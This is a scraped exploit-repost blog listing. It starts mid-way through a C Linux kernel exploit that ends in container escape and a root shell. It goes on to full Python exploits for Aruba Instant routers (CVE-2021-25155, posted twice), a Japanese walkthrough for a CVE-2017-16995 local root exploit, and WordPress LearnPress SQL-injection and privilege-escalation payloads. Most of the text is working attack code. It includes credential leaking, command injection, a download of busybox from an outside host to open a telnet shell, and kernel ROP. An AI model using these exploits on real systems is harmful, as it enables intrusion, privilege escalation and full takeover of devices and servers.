sizeof(msg_fake), 1) < 0) goto err_rmid; // Check if the leak is valid. if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG) { printf("[-] Error could not leak primary message.\n"); goto err_rmid; } // The primary message contains a pointer to the secondary message. msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE]; kheap_addr = msg->m_list_next; if (kheap_addr & (SECONDARY_SIZE - 1)) kheap_addr = msg->m_list_prev; // Calculate the address of the fake secondary message. kheap_addr -= SECONDARY_SIZE; printf("[+] kheap_addr: %" PRIx64 "\n", kheap_addr); if ((kheap_addr & 0xFFFF00000000FFFF) != 0xFFFF000000000000) { printf("[-] Error kernel heap address is incorrect.\n"); goto err_rmid; } printf("\n"); printf("[+] STAGE 3: KASLR bypass\n"); printf("[*] Freeing fake secondary messages...\n"); free_skbuff(ss, secondary_buf, sizeof(secondary_buf)); // Put kheap_addr at m_list_next & m_list_prev so that list_del() is possible. printf("[*] Spraying fake secondary messages...\n"); memset(secondary_buf, 0, sizeof(secondary_buf)); build_msg_msg((void *)secondary_buf, kheap_addr, kheap_addr, 0, 0); if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0) goto err_rmid; printf("[*] Freeing sk_buff data buffer...\n"); if (read_msg(msqid[fake_idx], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0) goto err_rmid; printf("[*] Spraying pipe_buffer objects...\n"); for (int i = 0; i < NUM_PIPEFDS; i++) { if (pipe(pipefd[i]) < 0) { perror("[-] pipe"); goto err_rmid; } // Write something to populate pipe_buffer. if (write(pipefd[i][1], "pwn", 3) < 0) { perror("[-] write"); goto err_rmid; } } printf("[*] Leaking and freeing pipe_buffer object...\n"); for (int i = 0; i < NUM_SOCKETS; i++) { for (int j = 0; j < NUM_SKBUFFS; j++) { if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0) { perror("[-] read"); goto err_rmid; } if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE) pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10]; } } kbase_addr = pipe_buffer_ops - ANON_PIPE_BUF_OPS; printf("[+] anon_pipe_buf_ops: %" PRIx64 "\n", pipe_buffer_ops); printf("[+] kbase_addr: %" PRIx64 "\n", kbase_addr); if ((kbase_addr & 0xFFFF0000000FFFFF) != 0xFFFF000000000000) { printf("[-] Error kernel base address is incorrect.\n"); goto err_rmid; } printf("\n"); printf("[+] STAGE 4: Kernel code execution\n"); printf("[*] Spraying fake pipe_buffer objects...\n"); memset(secondary_buf, 0, sizeof(secondary_buf)); buf = (struct pipe_buffer *)&secondary_buf; buf->ops = kheap_addr + 0x290; ops = (struct pipe_buf_operations *)&secondary_buf[0x290]; #ifdef KERNEL_COS_5_4_89 // RAX points to &buf->ops. // RCX points to &buf. ops->release = kbase_addr + PUSH_RAX_JMP_QWORD_PTR_RCX; #elif KERNEL_UBUNTU_5_8_0_48 // RSI points to &buf. ops->release = kbase_addr + PUSH_RSI_JMP_QWORD_PTR_RSI_39; #endif build_krop(secondary_buf, kbase_addr, kheap_addr + 0x2B0); if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0) goto err_rmid; // Trigger pipe_release(). printf("[*] Releasing pipe_buffer objects...\n"); for (int i = 0; i < NUM_PIPEFDS; i++) { if (close(pipefd[i][0]) < 0) { perror("[-] close"); goto err_rmid; } if (close(pipefd[i][1]) < 0) { perror("[-] close"); goto err_rmid; } } printf("[*] Checking for root...\n"); if ((fd = open("/etc/shadow", O_RDONLY)) < 0) { printf("[-] Error could not gain root privileges.\n"); goto err_rmid; } close(fd); printf("[+] Root privileges gained.\n"); printf("\n"); printf("[+] STAGE 5: Post-exploitation\n"); printf("[*] Escaping container...\n"); setns(open("/proc/1/ns/mnt", O_RDONLY), 0); setns(open("/proc/1/ns/pid", O_RDONLY), 0); setns(open("/proc/1/ns/net", O_RDONLY), 0); printf("[*] Cleaning up...\n"); for (int i = 0; i < NUM_MSQIDS; i++) { // TODO: Fix next pointer. if (i == fake_idx) continue; if (msgctl(msqid[i], IPC_RMID, NULL) < 0) perror("[-] msgctl"); } for (int i = 0; i < NUM_SOCKETS; i++) { if (close(ss[i][0]) < 0) perror("[-] close"); if (close(ss[i][1]) < 0) perror("[-] close"); } if (close(s) < 0) perror("[-] close"); printf("[*] Popping root shell...\n"); char *args[] = {"/bin/bash", "-i", NULL}; execve(args[0], args, NULL); return 0; err_rmid: for (int i = 0; i < NUM_MSQIDS; i++) { if (i == fake_idx) continue; if (msgctl(msqid[i], IPC_RMID, NULL) < 0) perror("[-] msgctl"); } err_no_rmid: return 1; }
  21. HireHackking

    Aruba Instant 8.7.1.0 - Arbitrary File Modification

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Aruba Instant 8.7.1.0 - Arbitrary File Modification # Date: 15/07/2021 # Exploit Author: Gr33nh4t # Vendor Homepage: https://www.arubanetworks.com/ # Version: # Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below # Aruba Instant 6.5.x: 6.5.4.18 and below # Aruba Instant 8.3.x: 8.3.0.14 and below # Aruba Instant 8.5.x: 8.5.0.11 and below # Aruba Instant 8.6.x: 8.6.0.6 and below # Aruba Instant 8.7.x: 8.7.1.0 and below # Tested on: Aruba Instant # CVE : CVE-2021-25155 import socket import sys import struct import time import threading import urllib3 import re import telnetlib import xml.etree.ElementTree as ET import requests urllib3.disable_warnings() CONTINUE_RACE = True SNPRINTF_CREATEFILE_MAX_LENGTH = 245 def race_papi_message(ip): global CONTINUE_RACE payload = b"\x49\x72" payload += b"\x00\x03" payload += b"\x7F\x00\x00\x01" payload += b"\x7F\x00\x00\x01" payload += b"\x00\x00" payload += b"\x00\x00" payload += b"\x3B\x7E" payload += b"\x41\x41" payload += b"\x04\x22" payload += b"\x00\x00" payload += b"\x02\x00" payload += b"\x00\x00" payload += b"\x00" * 12 * 4 text_to_send = bytes() for i in "msg_ref 3000 /tmp/cfg-plaintext\x00": text_to_send += struct.pack("B", int(ord(i)) ^ 0x93) packet = payload + text_to_send while CONTINUE_RACE: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect((ip, 8211)) s.send(packet) s.close() time.sleep(0.004) def find_credentials(text): res = re.search("mgmt-user .*", text)[0] res = res.split(" ") return (res[1], res[2]) def login(ip, username, password): login_data = { "opcode": "login", "user": username, "passwd": password, "refresh": "false", } res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=login_data, verify=False) root = ET.fromstring(res.text) return root.find("./data[@name='sid']").text def create_directory(ip, sid): request_data = "opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=".format(ip=ip, sid=sid) res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=request_data, verify=False) if "/tmp/oper_" in res.text: print("[+] Successfully created /tmp/oper_/ directory :)") return True else: print("[-] Failed creating /tmp/oper_/ directory") return False def prepare_upload_id(command): base_payload = "/../../etc/httpd/" cmd_len = len(command) padding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8 # for the .gz at the end and the '; + spaces if padding_len < 0: print("[-] Command too long length:{}".format(padding_len)) exit(1) return base_payload + ('/' * (padding_len - 1)) + 'A' + "'; {} #.gz".format(command) def create_file(ip, command): upload_id = prepare_upload_id(command) requests.post("https://{}:4343/swarm.cgi".format(ip), data={"opcode": "cp-upload", "file_type": "logo", "upload_id": upload_id, "sid": "basdfbsfbsfb"}, files={"file": "test2"}, verify=False) def run_command(ip, command): print("[*] Executing telnet") command = command.replace("?", "%3F") command = command.replace("#", "\\\\x23") s = requests.Session() req = requests.Request('GET', "https://{}:4343/A';%20{}%20%23".format(ip, command)) prep = req.prepare() response = s.send(prep, verify=False) return response.text def build_command(command): command = command.replace("/", "\\\\x2F") command = command.replace("#", "\\\\x23") command = command.replace("\"", "\\\"") command = command.replace("`", "\`") final_command = "echo -e \"{}\"|sh".format(command) return final_command def telnet_connect(router_ip): print("[*] Connecting to telnet") with telnetlib.Telnet(router_ip, 22222) as tn: tn.write(b"rm /etc/httpd/A*sh*.gz\n") tn.interact() def main(): global CONTINUE_RACE ip = sys.argv[1] print("[*] Starting the PAPI race thread") papi_thread = threading.Thread(target=race_papi_message, args=(ip, )) papi_thread.start() while CONTINUE_RACE: time.sleep(0.1) res = requests.get("https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1".format(ip), timeout=3, verify=False) if "version" in res.text: print("[+] Successfully leaked the password from config") CONTINUE_RACE = False file_content = re.findall("var SESSION_ID = '(.*?)';", res.text, re.S)[0] user, password = find_credentials(file_content) print("[+] Successfully extracted username: {} and password: {}".format(user, password)) sid = login(ip, user, password) print("[*] SID generated: {}".format(sid)) command = """cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh""" final_command = build_command(command) if not create_directory(ip, sid): return print("[*] Creating malicious file in /etc/httpd/") create_file(ip, final_command) print(run_command(ip, final_command)) time.sleep(1) # Sleeping waiting for telnet. telnet_connect(ip) if __name__ == "__main__": main()
  22. HireHackking

    タイトル:CVE-2017-16995 ubuntu16.04ローカル特権エスカレーション脆弱性が再び繰り返されます

    HireHackking posted a blog entry in Hacker Technology
    0x01はじめに この脆弱性は、Google Project Zeroによって発見されました。脆弱性は、EBPF BPF(2)システム(config_bpf_syscall)のコンパイルサポートを備えたLinuxカーネルに存在することが報告されており、メモリ任意の読み取りおよび書き込みの脆弱性です。この脆弱性は、EBPF検証モジュールの計算エラーによって引き起こされます。通常のユーザーは特別なBPFを構築して脆弱性を引き起こすことができ、悪意のある攻撃者は脆弱性を使用して地域の特権ハイキング操作を実行することもできます。 0x02脆弱性の影響 Linux Kernelバージョン4.14-4.4(DebianとUbuntuの分布に影響) 0x03テスト環境 ubuntu16.04 x64 0x04テスト手順 1。権利を提起するための住所をダウンロード: http://Cyclabs.com/exploits/upstream44.c 2.CD /Opt Directoryに切り替えてExp:ダウンロード: CD /OPT #Preparation//OPTに777の権限があるかどうかを確認するには、それ以外の場合はExpをコンパイルして実行できません WGET http://Cyclabs.com/exploits/upstream44.c 3.一部のubuntuにはGCCがインストールされておらず、インストールする必要があります。 sudo apt-getインストールGCC コンパイルされたコンポーネントが不足している場合は、LIBプラグインをインストールする必要があります apt-getインストールlibc6-dev 4。その後、GCCを使用してコンパイルします GCC -O Exp UpStream44.C 5。expを実行可能許可に変更します chmod +x exp 6.権利を引き上げるためにExpを実行します ./exp 0x05脆弱性修正 現在、明確なパッチアップグレード計画はありません。リスクを評価した後、カーネルパラメーターを変更して、ユーザーが通常のユーザーをBPF(2)システム呼び出しの使用を制限することを一時的に推奨します。 echo 1/proc/sys/kernel/unprivileged_bpf_disabled
  23. HireHackking

    WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated) # Date: 07-17-2021 # Exploit Author: nhattruong or nhattruong.blog # Vendor Homepage: https://thimpress.com/learnpress/ # Software Link: https://wordpress.org/plugins/learnpress/ # Version: < 3.2.6.8 # References link: https://wpscan.com/vulnerability/10208 # CVE: CVE-2020-6010 POC: 1. Go to url http://<host>/wp-admin 2. Login with a cred 3. Execute the payload POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/plain, */* Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 128 Origin: http://localhost Connection: close Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145 type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- - # Modify current_items[] as you want
  24. HireHackking

    Aruba Instant (IAP) - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    import socket import sys import struct import time import threading import urllib3 import re import telnetlib import xml.etree.ElementTree as ET import requests urllib3.disable_warnings() CONTINUE_RACE = True SNPRINTF_CREATEFILE_MAX_LENGTH = 245 def race_papi_message(ip): global CONTINUE_RACE payload = b"\x49\x72" payload += b"\x00\x03" payload += b"\x7F\x00\x00\x01" payload += b"\x7F\x00\x00\x01" payload += b"\x00\x00" payload += b"\x00\x00" payload += b"\x3B\x7E" payload += b"\x41\x41" payload += b"\x04\x22" payload += b"\x00\x00" payload += b"\x02\x00" payload += b"\x00\x00" payload += b"\x00" * 12 * 4 text_to_send = bytes() for i in "msg_ref 3000 /tmp/cfg-plaintext\x00": text_to_send += struct.pack("B", int(ord(i)) ^ 0x93) packet = payload + text_to_send while CONTINUE_RACE: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect((ip, 8211)) s.send(packet) s.close() time.sleep(0.004) def find_credentials(text): res = re.search("mgmt-user .*", text)[0] res = res.split(" ") return (res[1], res[2]) def login(ip, username, password): login_data = { "opcode": "login", "user": username, "passwd": password, "refresh": "false", } res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=login_data, verify=False) root = ET.fromstring(res.text) return root.find("./data[@name='sid']").text def create_directory(ip, sid): request_data = "opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20\"https://{ip}:4343/%09--directory-prefix%09/tmp/oper_/%09#\"'&refresh=false&sid={sid}&nocache=0.23759201691110987&=".format(ip=ip, sid=sid) res = requests.post("https://{}:4343/swarm.cgi".format(ip), data=request_data, verify=False) if "/tmp/oper_" in res.text: print("[+] Successfully created /tmp/oper_/ directory :)") return True else: print("[-] Failed creating /tmp/oper_/ directory") return False def prepare_upload_id(command): base_payload = "/../../etc/httpd/" cmd_len = len(command) padding_len = SNPRINTF_CREATEFILE_MAX_LENGTH - cmd_len - len(base_payload) - 8 # for the .gz at the end and the '; + spaces if padding_len < 0: print("[-] Command too long length:{}".format(padding_len)) exit(1) return base_payload + ('/' * (padding_len - 1)) + 'A' + "'; {} #.gz".format(command) def create_file(ip, command): upload_id = prepare_upload_id(command) requests.post("https://{}:4343/swarm.cgi".format(ip), data={"opcode": "cp-upload", "file_type": "logo", "upload_id": upload_id, "sid": "basdfbsfbsfb"}, files={"file": "test2"}, verify=False) def run_command(ip, command): print("[*] Executing telnet") command = command.replace("?", "%3F") command = command.replace("#", "\\\\x23") s = requests.Session() req = requests.Request('GET', "https://{}:4343/A';%20{}%20%23".format(ip, command)) prep = req.prepare() response = s.send(prep, verify=False) return response.text def build_command(command): command = command.replace("/", "\\\\x2F") command = command.replace("#", "\\\\x23") command = command.replace("\"", "\\\"") command = command.replace("`", "\`") final_command = "echo -e \"{}\"|sh".format(command) return final_command def telnet_connect(router_ip): print("[*] Connecting to telnet") with telnetlib.Telnet(router_ip, 22222) as tn: tn.write(b"rm /etc/httpd/A*sh*.gz\n") tn.interact() def main(): global CONTINUE_RACE ip = sys.argv[1] print("[*] Starting the PAPI race thread") papi_thread = threading.Thread(target=race_papi_message, args=(ip, )) papi_thread.start() while CONTINUE_RACE: time.sleep(0.1) res = requests.get("https://{}:4343/swarm.cgi?opcode=single_signon&key=AAAA&ip=%20127.0.0.1".format(ip), timeout=3, verify=False) if "version" in res.text: print("[+] Successfully leaked the password from config") CONTINUE_RACE = False file_content = re.findall("var SESSION_ID = '(.*?)';", res.text, re.S)[0] user, password = find_credentials(file_content) print("[+] Successfully extracted username: {} and password: {}".format(user, password)) sid = login(ip, user, password) print("[*] SID generated: {}".format(sid)) command = """cd /tmp;/usr/sbin/wget https://busybox.net/downloads/binaries/1.21.1/busybox-armv5l --no-check-certificate -O telnetd;chmod +x telnetd;./telnetd -p 22222 -l sh""" final_command = build_command(command) if not create_directory(ip, sid): return print("[*] Creating malicious file in /etc/httpd/") create_file(ip, final_command) print(run_command(ip, final_command)) time.sleep(1) # Sleeping waiting for telnet. telnet_connect(ip) if __name__ == "__main__": main()
  25. HireHackking

    WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation # Date: 07-17-2021 # Exploit Author: nhattruong or nhattruong.blog # Vendor Homepage: https://thimpress.com/learnpress/ # Software Link: https://wordpress.org/plugins/learnpress/ # Version: < 3.2.6.9 # References link: https://wpscan.com/vulnerability/22b2cbaa-9173-458a-bc12-85e7c96961cd # CVE: CVE-2020-11511 POC: 1. Find out your user id 2. Login with your cred 3. Execute the payload http://<host>/wp-admin/?action=accept-to-be-teacher&user_id=<your_id> # Done!